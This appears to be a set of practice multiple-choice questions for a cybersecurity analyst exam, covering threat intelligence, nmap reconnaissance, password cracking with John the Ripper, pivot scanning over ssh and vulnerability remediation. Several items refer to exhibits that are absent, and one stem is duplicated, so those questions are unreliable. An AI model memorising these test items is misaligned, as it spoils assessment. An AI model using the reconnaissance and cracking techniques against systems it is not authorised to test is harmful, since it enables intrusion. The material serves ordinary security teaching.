1. Olivia is considering potential sources for threat intelligence information that she might
incorporate into her security program. Which one of the following sources is most likely to
be available without a subscription fee?
A. Vulnerability feeds B. Open source C. Closed source D. Proprietary.
During a port scan of her network, Cynthia discovers a workstation that shows the following
ports open. What should her next action be?
A. Determine the reason for the ports being open. B. Investigate the potentially compromised workstation. C. Run a vulnerability scan to identify vulnerable services. D. Reenable the workstation’s local host firewall.
Charles is working with leaders of his organization to determine the types of information
that should be gathered in his new threat intelligence program. In what phase of the intelligence
cycle is he participating?
A. Dissemination B. Feedback C. Analysis D. Requirements.
What term is used to describe the groups of related organizations who pool resources to
share cybersecurity threat information and analyses?
A. SOC B. ISAC C. CERT D. CIRT.
Singh incorporated the Cisco Talos tool into his organization’s threat intelligence program.
He uses it to automatically look up information about the past activity of IP addresses sending
email to his mail servers. What term best describes this intelligence source?
A. Open source B. Behavioral C. Reputational D. Indicator of compromise.
Jamal is assessing the risk to his organization from their planned use of AWS Lambda,
a serverless computing service that allows developers to write code and execute functions
directly on the cloud platform. What cloud tier best describes this service?
A. SaaS B. PaaS C. IaaS D. FaaS.
Alfonzo is an IT professional at a Portuguese university who is creating a cloud environment
for use only by other Portuguese universities. What type of cloud deployment model
is he using?
A. Public cloud B. Private cloud C. Hybrid cloud D. Community cloud.
While gathering reconnaissance data for a penetration test, Charlene uses the MXToolbox
MX Lookup tool. What can she determine from the response to her query shown here?
A. The mail servers are blacklisted. B. The mail servers have failed an SMTP test. C. The mail servers are clustered. D. There are two MX hosts listed in DNS.
Alex wants to scan a protected network and has gained access to a system that can communicate
to both his scanning system and the internal network, as shown in the image here.
What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap
on system A? A. A reflection scan B. A proxy scan C. A randomized host scan D. A ping-through scan.
Lucy recently detected a cross-site scripting vulnerability in her organization’s web server.
The organization operates a support forum where users can enter HTML tags and the
resulting code is displayed to other site visitors. What type of cross-site scripting vulnerability
did Lucy discover? A. Persistent B. Reflected C. DOM-based D. Blind.
Florian discovered a vulnerability in a proprietary application developed by his organization.
The application performs memory management using the malloc() function and one
area of memory allocated in this manner has an overflow vulnerability. What term best
describes this overflow?
A. Buffer overflow B. Stack overflow C. Integer overflow D. Heap overflow.
Geoff is reviewing logs and sees a large number of attempts to authenticate to his VPN
server using many different username and password combinations. The same usernames are
attempted several hundred times before moving on to the next one. What type of attack is
most likely taking place? A. Credential stuffing B. Password spraying C. Brute-force D. Rainbow table.
The company that Dan works for has recently migrated to an SaaS provider for its
enterprise resource planning (ERP) software. In its traditional on-site ERP environment,
Dan conducted regular port scans to help with security validation for the systems. What
will Dan most likely have to do in this new environment?
A. Use a different scanning tool. B. Rely on vendor testing and audits. C. Engage a third-party tester. D. Use a VPN to scan inside the vendor’s security perimeter.
Matthew is analyzing some code written in the C programming language and discovers that
it is using the functions listed here. Which of these functions poses the greatest security
vulnerability? A. strcpy() B. main() C. printf() D. scanf().
Azra believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user’s desktop, she sees the following command on the screen:
user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?
A. They are attempting to hash a file. B. They are attempting to crack hashed passwords. C. They are attempting to crack encrypted passwords. D. They are attempting a pass-the-hash attack.
While conducting reconnaissance of his own organization, Ian discovers that multiple certificates are self-signed. What issue should he report to his management?
A. Self-signed certificates do not provide secure encryption for site visitors. B. Self-signed certificates can be revoked only by the original creator. C. Self-signed certificates will cause warnings or error messages. D. None of the above.
Carrie needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. She knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should she allow through the
system’s firewall for externally initiated connections? A. 80, 135, 139, and 445 B. 80, 445, and 3389 C. 135, 139, and 445 D. No ports should be open.
While conducting reconnaissance, Piper discovers what she believes is an SMTP service
running on an alternate port. What technique should she use to manually validate
her guess?
A. Send an email via the open port. B. Send an SMTP probe. C. Telnet to the port. D. SSH to the port.
What two pieces of information does nmap need to estimate network path distance? A. IP address and TTL B. TTL and operating system C. Operating system and BGP flags D. TCP flags and IP address.
Marta is a security analyst who has been tasked with performing nmap scans of her organization’s network. She is a new hire and has been given this logical diagram of the organization’s network but has not been provided with any additional detail.
Marta wants to determine what IP addresses to scan from location A. How can she find this information? A. Scan the organization’s web server and then scan the other 255 IP addresses in its
subnet. B. Query DNS and WHOIS to find her organization’s registered hosts. C. Contact ICANN to request the data. D. Use traceroute to identify the network that the organization’s domain resides in.
Chris wants to gather as much information as he can about an organization using DNS harvesting
techniques. Which of the following methods will most easily provide the most useful
information if they are all possible to conduct on the network he is targeting? A. DNS record enumeration B. Zone transfer C. Reverse lookup D. Domain brute-forcing.
While gathering DNS information about an organization, Ryan discovered multiple AAAA
records. What type of reconnaissance does this mean Ryan may want to consider? A. Second-level DNS queries B. IPv6 scans C. Cross-domain resolution D. A CNAME verification.
When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing?
A. How fast the scan runs B. The TCP timeout flag it will set C. How many retries it will perform D. How long the scan will take to start up.
While application vulnerability scanning one of her target organizations web servers,
Andrea notices that the server’s hostname is resolving to a cloudflare.com host. What
does Andrea know about her scan? A. It is being treated like a DDoS attack. B. It is scanning a CDN-hosted copy of the site. C. It will not return useful information. D. She cannot determine anything about the site based on this information.
While tracking a potential APT on her network, Cynthia discovers a network flow for her company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?
Date flow start Duration Proto Src IP Addr:Port Dst IP
Addr:Port Packets Bytes Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1 A. A web browsing session B. Data exfiltration C. Data infiltration D. A vulnerability scan.
Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which
of the following nmap commands will not provide her with a list of likely printers?
A. nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt B. nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt C. nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt D. nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt.
Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If
he has no other data, what should his best guess be about what the host is? A. A print server B. A Microsoft SQL server C. A MySQL server D. A secure web server running on an alternate port.
While conducting a topology scan of a remote web server, Susan notes that the IP addresses returned for the same DNS entry change over time. What has she likely encountered? A. A route change B. Fast-flux DNS C. A load balancer D. An IP mismatch.
Kwame is reviewing his team’s work as part of a reconnaissance effort and is checking Wireshark packet captures. His team reported no open ports on 10.0.2.15. What issue should he identify with their scan based on the capture shown here? A. The host was not up. B. Not all ports were scanned. C. The scan scanned only UDP ports. D. The scan was not run as root.
Nihar wants to conduct an nmap scan of a firewalled subnet. Which of the following is not an nmap firewall evasion technique he could use?
A. Fragmenting packets B. Changing packet header flags C. Spoofing the source IP D. Appending random data.
Aidan operates the point-of-sale network for a company that accepts credit cards and is thus required to be compliant with PCI DSS. During his regular assessment of the pointof-sale terminals, he discovers that a recent Windows operating system vulnerability exists on all of them. Since they are all embedded systems that require a manufacturer update, he knows that he cannot install the available patch. What is Aidan’s best option to stay compliant with PCI DSS and protect his vulnerable systems? A. Replace the Windows embedded point-of-sale terminals with standard Windows systems. B. Build a custom operating system image that includes the patch. C. Identify, implement, and document compensating controls. D. Remove the POS terminals from the network until the vendor releases a patch.
Amir’s remote scans of a target organization’s class C network block using nmap (nmap -sS 10.0.10.1/24) show only a single web server. If Amir needs to gather additional reconnaissance information about the organization’s network, which of the following scanning techniques is most likely to provide additional detail?
A. Use a UDP scan. B. Perform a scan from on-site. C. Scan using the -p 1-65535 flag. D. Use nmap’s IPS evasion techniques.
As part of his active reconnaissance activities, Frank is provided with a shell account accessible via SSH. If Frank wants to run a default nmap scan on the network behind the firewall shown here, how can he accomplish this? A. ssh -t 192.168.34.11 nmap 192.168.34.0/24 B. ssh -R 8080:192.168.34.11:8080 [remote account:remote password] C. ssh -proxy 192.168.11 [remote account:remote password] D. Frank cannot scan multiple ports with a single ssh command.
Rick is reviewing flows of a system on his network and discovers the following flow logs.
What is the system doing?
ICMP "Echo request"
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:11.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11 924 1
A. A port scan B. A failed three-way handshake C. A ping sweep D. A traceroute.
Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4? A. The host does not have a DNS entry. B. It is running a service on port 139. C. It is running a service on port 445. D. It is a Windows system.
In what type of attack does the adversary leverage a position on a guest operating system
to gain access to hardware resources assigned to other operating systems running in the
same hardware environment? A. Buffer overflow B. Directory traversal C. VM escape D. Cross-site scripting.
Vic scanned a Windows server used in his organization and found the result shown here. The server is on an internal network with access limited to IT staff and is not part of a domain. How urgently should Vic remediate this vulnerability?
A. Vic should drop everything and remediate this vulnerability immediately. B. While Vic does not need to drop everything, this vulnerability requires urgent attention and should be addressed quickly. C. This is a moderate vulnerability that can be scheduled for remediation at a convenient
time. D. This vulnerability is informational in nature and may be left in place.
Wendy is the security administrator for a membership association that is planning to
launch an online store. As part of this launch, she will become responsible for ensuring
that the website and associated systems are compliant with all relevant standards. What
regulatory regime specifically covers credit card information?
A. PCI DSS B. FERPA C. HIPAA D. SOX.
Harold is preparing to correct the vulnerability. What service should he inspect to identify the issue? A. SSH B. HTTPS C. RDP D. SFTP.
What priority should Stella place on remediating this vulnerability?
A. Stella should make this vulnerability one of her highest priorities. B. Stella should remediate this vulnerability within the next several weeks. C. Stella should remediate this vulnerability within the next several months. D. Stella does not need to assign any priority to remediating this vulnerability.
Natalie ran a vulnerability scan of a web application recently deployed by her organization,
and the scan result reported a blind SQL injection. She reported the vulnerability
to the developers, who scoured the application and made a few modifications but did not
see any evidence that this attack was possible. Natalie reran the scan and received the
same result. The developers are now insisting that their code is secure. What is the most
likely scenario?
A. The result is a false positive. B. The code is deficient and requires correction. C. The vulnerability is in a different web application running on the same server. D. Natalie is misreading the scan report.
Joe is conducting a network vulnerability scan against his datacenter and receives reports from system administrators that the scans are slowing down their systems. There are no network connectivity issues, only performance problems on individual hosts. He looks at the scan settings shown here. Which setting would be most likely to correct the problem? A. Scan IP addresses in a random order B. Network timeout (in seconds) C. Max simultaneous checks per host D. Max simultaneous hosts per scan.
Laura is working to upgrade her organization’s vulnerability management program. She
would like to add technology that is capable of retrieving the configurations of systems,
even when they are highly secured. Many systems use local authentication, and she wants
to avoid the burden of maintaining accounts on all of those systems. What technology
should Laura consider to meet her requirement?
A. Credentialed scanning B. Uncredentialed scanning C. Server-based scanning D. Agent-based scanning.
Ryan will not be able to correct the vulnerability for several days. In the meantime, he would like to configure his intrusion prevention system to watch for issues related to this vulnerability. Which one of the following protocols would an attacker use to exploit this
vulnerability?
A. SSH B. HTTPS C. FTP D. RDP.
Which one of the following actions could Ryan take to remediate the underlying issue without disrupting business activity? A. Disable the IIS service. B. Apply a security patch. C. Modify the web application. D. Apply IPS rules.
If an attacker is able to exploit this vulnerability, what is the probable result that will have the highest impact on the organization? A. Administrative control of the server B. Complete control of the domain C. Access to configuration information D. Access to web application logs.
Ted is configuring vulnerability scanning for a file server on his company’s internal network. The server is positioned on the network as shown here. What types of vulnerability scans should Ted perform to balance the efficiency of scanning effort with expected results? A. Ted should not perform scans of servers on the internal network. B. Ted should only perform internal vulnerability scans. C. Ted should only perform external vulnerability scans. D. Ted should perform both internal and external vulnerability scans.
Ji-won recently restarted an old vulnerability scanner that had not been used in more than
a year. She booted the scanner, logged in, and configured a scan to run. After reading the
scan results, she found that the scanner was not detecting known vulnerabilities that were
detected by other scanners. What is the most likely cause of this issue? A. The scanner is running on an outdated operating system. B. The scanner’s maintenance subscription is expired. C. Ji-won has invalid credentials on the scanner. D. The scanner does not have a current, valid IP address.
After reviewing the results of a vulnerability scan, Gabriella discovered a flaw in her
Oracle database server that may allow an attacker to attempt a direct connection to the
server. She would like to review NetFlow logs to determine what systems have connected
to the server recently. What TCP port should Gabriella expect to find used for this
communication?
A. 443 B. 1433 C. 1521 D. 8080.
During a vulnerability scan, Patrick discovered that the configuration management agent installed on all of his organization’s Windows servers contains a serious vulnerability. The manufacturer is aware of this issue, and a patch is available. What process should Patrick follow to correct this issue? A. Immediately deploy the patch to all affected systems. B. Deploy the patch to a single production server for testing and then deploy to all servers if that test is successful. C. Deploy the patch in a test environment and then conduct a staged rollout in production. D. Disable all external access to systems until the patch is deployed.
Brian is considering the use of several different categories of vulnerability plug-ins. Of the types listed here, which is the most likely to result in false positive reports? A. Registry inspection B. Banner grabbing C. Service interrogation D. Fuzzing.
Which one of the following is not an appropriate criterion to use when prioritizing the remediation of vulnerabilities?
A. Network exposure of the affected system B. Difficulty of remediation C. Severity of the vulnerability D. All of these are appropriate.
Larry recently discovered a critical vulnerability in one of his organization’s database servers during a routine vulnerability scan. When he showed the report to a database administrator, the administrator responded that they had corrected the vulnerability by using a vendor-supplied workaround because upgrading the database would disrupt an important process. Larry verified that the workaround is in place and corrects the vulnerability.How should Larry respond to this situation?
A. Mark the report as a false positive. B. Insist that the administrator apply the vendor patch. C. Mark the report as an exception. D. Require that the administrator submit a report describing the workaround after each vulnerability scan.
Larry recently discovered a critical vulnerability in one of his organization’s database servers during a routine vulnerability scan. When he showed the report to a database administrator, the administrator responded that they had corrected the vulnerability by using a vendor-supplied workaround because upgrading the database would disrupt an important process. Larry verified that the workaround is in place and corrects the vulnerability.How should Larry respond to this situation?
What is the most likely cause of this report? A. The vulnerability scanner requires an update. B. The vulnerability scanner depends on version detection. C. The database administrator incorrectly applied the workaround. D. Larry misconfigured the scan.
Margot discovered that a server in her organization has a SQL injection vulnerability. She would like to investigate whether attackers have attempted to exploit this vulnerability. Which one of the following data sources is least likely to provide helpful information? A. NetFlow logs B. Web server logs C. Database logs D. IDS logs.
|
